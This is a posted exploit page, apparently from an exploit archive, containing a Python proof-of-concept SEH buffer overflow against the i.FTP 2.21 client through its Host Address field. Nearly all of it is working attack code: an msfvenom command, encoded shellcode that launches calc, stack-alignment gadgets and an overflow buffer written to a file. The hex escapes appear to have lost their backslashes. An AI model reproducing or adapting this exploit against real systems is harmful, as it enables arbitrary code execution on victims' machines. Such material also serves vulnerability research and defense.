I.FTP 2.21 Host Address / URL Field SEH Exploit
Posted on 30 November -0001
<HTML><HEAD><TITLE>i.FTP 2.21 Host Address / URL Field SEH Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#!/usr/bin/python # Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit # Date: 3-5-2016 # Exploit Author: Tantaryu MING # Vendor Homepage: http://www.memecode.com/iftp.php # Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe # Version: 2.21 # Tested on: Windows 7 SP1 x86_64 # How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button ''' msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b 'x00x0dx20x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff' BufferREgister=EAX ''' shellcode = ( "x50x59x49x49x49x49x49x49x49x49x49x49x51x5ax56" "x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30" "x41x30x30x41x42x41x41x42x54x41x41x51x32x41x42" "x32x42x42x30x42x42x58x50x38x41x43x4ax4ax49x4b" "x4cx5ax48x4bx32x35x50x33x30x43x30x33x50x4dx59" "x4ax45x36x51x39x50x42x44x4cx4bx30x50x56x50x4c" "x4bx51x42x34x4cx4cx4bx30x52x35x44x4cx4bx42x52" "x31x38x44x4fx58x37x51x5ax57x56x30x31x4bx4fx4e" "x4cx47x4cx35x31x43x4cx53x32x56x4cx51x30x59x51" "x58x4fx34x4dx53x31x49x57x4bx52x4ax52x50x52x50" "x57x4cx4bx31x42x44x50x4cx4bx50x4ax37x4cx4cx4b" "x30x4cx54x51x52x58x4bx53x50x48x35x51x38x51x50" "x51x4cx4bx31x49x47x50x33x31x48x53x4cx4bx51x59" "x32x38x4dx33x47x4ax47x39x4cx4bx47x44x4cx4bx35" "x51x59x46x56x51x4bx4fx4ex4cx59x51x48x4fx54x4d" "x45x51x58x47x57x48x4dx30x33x45x4ax56x55x53x53" "x4dx4cx38x57x4bx33x4dx47x54x52x55x4bx54x30x58" "x4cx4bx31x48x36x44x43x31x59x43x43x56x4cx4bx44" "x4cx50x4bx4cx4bx46x38x35x4cx45x51x4ex33x4cx4b" "x34x44x4cx4bx45x51x58x50x4bx39x51x54x36x44x57" "x54x51x4bx31x4bx33x51x36x39x51x4ax30x51x4bx4f" "x4bx50x51x4fx31x4fx30x5ax4cx4bx45x42x4ax4bx4c" "x4dx51x4dx33x5ax55x51x4cx4dx4dx55x58x32x35x50" "x45x50x45x50x56x30x33x58x30x31x4cx4bx42x4fx4d" "x57x4bx4fx38x55x4fx4bx4ax50x4ex55x39x32x50x56" "x52x48x59x36x4cx55x4fx4dx4dx4dx4bx4fx49x45x37" "x4cx35x56x33x4cx44x4ax4dx50x4bx4bx4bx50x42x55" "x33x35x4fx4bx37x37x55x43x53x42x52x4fx53x5ax33" "x30x46x33x4bx4fx39x45x53x53x45x31x52x4cx35x33" "x35x50x41x41" ) eax_zeroed = 'x25x2Ex2Ex2Ex2E' eax_zeroed += 'x25x11x11x11x11' align_to_eax = "x54x58" # Get ESP and pop it into EAX align_to_eax += "x2dx7dx7dx7dx7d" # SUB EAX, 0x7d7d7d7d align_to_eax += "x2dx01x01x01x01" # SUB EAX, 0x01010101 align_to_eax += "x2dx01x01x02x02" # SUB EAX, 0x02020101 align_to_eax += "x2dx7cx73x7fx7f" # SUB EAX, 0x7f7f737c buffer = "x41" * 1865 buffer += "x42x42x71x04" # Pointer to Next SEH Record buffer += "x78x2ax01x10" # SEH HANDLER buffer += eax_zeroed buffer += align_to_eax buffer += "x43" * 5 buffer += shellcode buffer += "E" * 4 f = open('exploit.txt', "wb") f.write(buffer) f.close() </BODY></HTML>